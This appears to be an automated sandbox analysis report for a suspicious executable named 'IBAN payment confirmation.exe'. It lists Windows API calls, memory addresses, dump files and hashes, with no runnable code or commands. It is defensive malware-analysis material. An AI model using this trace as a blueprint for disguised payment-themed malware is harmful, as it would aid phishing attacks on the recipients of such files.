                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointerwsprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 327478801-0
                                                                                                                              • Opcode ID: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                                              • Instruction ID: 7b0a8f507568a188bd2c0a80d79ed85a493e53c174130335dce059ea839ee6d0
                                                                                                                              • Opcode Fuzzy Hash: 9c9351cd5493f6acb52240965b0f8c81d6de1eb3f207cde75e45128e5fdd4ef9
                                                                                                                              • Instruction Fuzzy Hash: 13E01AB1B15114ABDB01ABE59D49CEEB66DEB00319F20043BF101B00D1C27989019E7E
                                                                                                                              APIs
                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 390214022-0
                                                                                                                              • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                              • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                                                              • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                                                              • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                                                              APIs
                                                                                                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PathSearch
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2203818243-0
                                                                                                                              • Opcode ID: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                                              • Instruction ID: f28d117729d6db308ba67ea043928a1e47cb3974c8f3bd2f87491376c6cbdc89
                                                                                                                              • Opcode Fuzzy Hash: 95a92e1ee1deeee5d79651ccf25ffb42940f0592216d2c6bc0bf3332ed8f09d6
                                                                                                                              • Instruction Fuzzy Hash: 73E048B2314200AAD710DFA5DE48EEA776CDB0036CF304676E611A61D0D2B45A41D72D
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,000001FB,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Open
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 71445658-0
                                                                                                                              • Opcode ID: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                              • Instruction ID: 83e72149abe1372da0a381261de05d436a54b8bdbe31dfced4d63089b9680d6c
                                                                                                                              • Opcode Fuzzy Hash: 4e0e47c2d07e12dc62bd4475595d204c43dc26f216d837d31c208bac29f0ca72
                                                                                                                              • Instruction Fuzzy Hash: A0E04F7624010CBADB00DFA4ED46F9577ECEB14705F108425B608D6091C674E5008768
                                                                                                                              APIs
                                                                                                                              • ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                              • Instruction ID: e5271f86abd3e691175676240f3b6d2dabcfddd4658b863dc1b472273301a449
                                                                                                                              • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                                              • Instruction Fuzzy Hash: 8EE08632104259ABDF109E548C04EEB775CFB04350F044432F911E3140D231E820DBA4
                                                                                                                              APIs
                                                                                                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 544645111-0
                                                                                                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                              • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                                              • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                              • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                                                                                              • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                                                                                              • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 973152223-0
                                                                                                                              • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                              • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                                                                                              • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                                                                                              • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocGlobal
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3761449716-0
                                                                                                                              • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                              • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                                              • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                                              • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405422
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405443
                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 00405350
                                                                                                                                • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405495
                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004054AA
                                                                                                                              • ShowWindow.USER32(00000000), ref: 004054CE
                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004054D3
                                                                                                                              • ShowWindow.USER32(00000008), ref: 0040551D
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
                                                                                                                              • CreatePopupMenu.USER32 ref: 00405562
                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405596
                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004055F7
                                                                                                                              • EmptyClipboard.USER32 ref: 004055FD
                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405613
                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405647
                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00405652
                                                                                                                              • CloseClipboard.USER32 ref: 00405658
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                              • String ID: {
                                                                                                                              • API String ID: 590372296-366298937
                                                                                                                              • Opcode ID: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                              • Instruction ID: 9fa9afbe460ba73b362fbd7a7e80f39848d7c2b38d0fa32ac3ffaaa5a75fb061
                                                                                                                              • Opcode Fuzzy Hash: 0c7871d9c118b0e9bc82f4af322ee916726f515fd3ec4b55100c1069ec2247ae
                                                                                                                              • Instruction Fuzzy Hash: 4AB16B70900209BFDF219F60DD89AAE7B79FB04315F50803AFA05BA1A0C7759E52DF69
                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404619
                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404643
                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046F4
                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046FF
                                                                                                                              • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 00404731
                                                                                                                              • lstrcatW.KERNEL32(?,Call), ref: 0040473D
                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474F
                                                                                                                                • Part of subcall function 004056AA: GetDlgItemTextW.USER32(?,?,00000400,00404786), ref: 004056BD
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IBAN payment confirmation.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061E1
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\IBAN payment confirmation.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 004061F5
                                                                                                                                • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403512), ref: 00406208
                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 00404810
                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040482B
                                                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048B1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet$Call
                                                                                                                              • API String ID: 2246997448-2268674972
                                                                                                                              • Opcode ID: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                              • Instruction ID: fc6e5784adbf23f3bf0ca4204261aafad130db7b69f5cfc08d06a9dfd3cb4e02
                                                                                                                              • Opcode Fuzzy Hash: 5e1be59e26550fe03483dde9140ef9c7df16d0723f1807c21cae017824fc49c2
                                                                                                                              • Instruction Fuzzy Hash: 1B916FB2900209ABDB11AFA1CC85AAF77B8EF85354F10847BF701B72D1D77C99418B69
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileFindFirst
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1974802433-0
                                                                                                                              • Opcode ID: e985ba924887a1bc27921ead0041ac8d1a9f7f1065ea0f82ea0bc3cd49787025
                                                                                                                              • Instruction ID: c3eebe46d33317c4d9c4db9deeb30b83dd141210d4acf70d00b973005abdca29
